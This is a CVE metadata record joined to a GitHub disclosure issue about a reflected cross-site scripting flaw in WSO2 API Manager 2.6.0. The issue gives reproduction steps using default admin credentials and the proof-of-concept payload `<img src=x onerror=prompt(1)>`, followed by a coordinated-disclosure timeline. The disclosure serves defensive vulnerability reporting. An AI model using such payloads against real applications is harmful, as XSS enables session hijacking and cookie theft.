{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 2.5, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20439-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20439-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/21" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/21
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Reflected <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">WSO2 API Manager</a> Version: <a href="https://docs.wso2.com/display/AM260/About+this+Release">2.6.0</a> Homepage: https://wso2.com/ Severity: Low Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version 2.6.0 Product. Issue 01: Reflected cross site scripting: ![1](https://user-images.githubusercontent.com/13975575/71409357-43d8f380-2667-11ea-81e7-16d149f304ac.png) Figure 01: Start creating an API ![2](https://user-images.githubusercontent.com/13975575/71409354-43405d00-2667-11ea-84b2-ac934e8eafc8.png) Figure 02: Click on `Add Scope` button to add resources information ![3](https://user-images.githubusercontent.com/13975575/71409355-43405d00-2667-11ea-8cc1-2c89cadd8697.png) Figure 03: Enter XSS Payload in `Roles` section ![4](https://user-images.githubusercontent.com/13975575/71409356-43d8f380-2667-11ea-9605-fcfd9908ab92.png) Figure 04: Injected XSS payload, `<img src=x onerror=prompt(1)>` gets reflected in the same browser as response. --- <strong>Reproducing Steps</strong> 1. Login to the application (admin/admin) through the login <a href="https://192.168.107.2:9443/publisher/site/pages/login.jag">URL.</a> 2. Go to <a href="https://192.168.0.138:9443/publisher/design">Design API page</a> to create API. 3. Fill the details up to <a href="https://192.168.0.138:9443/publisher/manage?name=test&version=test&provider=admin">manage page.</a> 4. Choose `Add Scope` to include resources information 5. Add XSS payload, `<img src=x onerror=prompt(1)>` in `Roles` column 6. Clicking on `Add Scope` button executes the injected XSS Payload. --- <strong>Timeline</strong> 2019-07-05 – Discovered in `WSO2 API Manager v2.6.0` 2019-07-06 – Reported to <a href="https://www.intigriti.com/">intigriti</a> platform. 2019-07-08 - Rejected the submission in <a href="https://www.intigriti.com/">intigriti</a> platform. 2019-07-24 - Closed the issue by <a href="https://www.intigriti.com/">intigriti</a> platform. 2019-07-26 – Discovered in WSO2 API Manager version 2.6.0. 2019-07-26 – Reported to security@wso2.com 2019-07-26 – Got instant response from WSO2 security team, "Thanks for your continuous effort on analyzing security vulnerabilities on WSO2 products. We will evaluate your finding and get back to you as soon as possible with our feedback." 2019-08-05 – Got mail from WSO2 team saying, "We were able to reproduce the issue with APIM 2.6.0. We will fix this and provide you with an update." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement is scheduled 2019-10-08 - Got mail saying, "Customer Security Announcement for the issues are scheduled by the end of September" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634 </a>and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">WSO2-2019-0635</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Reflected Cross Site Scripting (XSS) in 'roles' | WSO2 API Manager version 2.6.0 | WSO2 Product
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/21/comments
0
2019-12-24T10:37:12Z
2020-01-17T12:17:16Z
https://github.com/cybersecurityworks/Disclosed/issues/21
542,083,754
21
1,043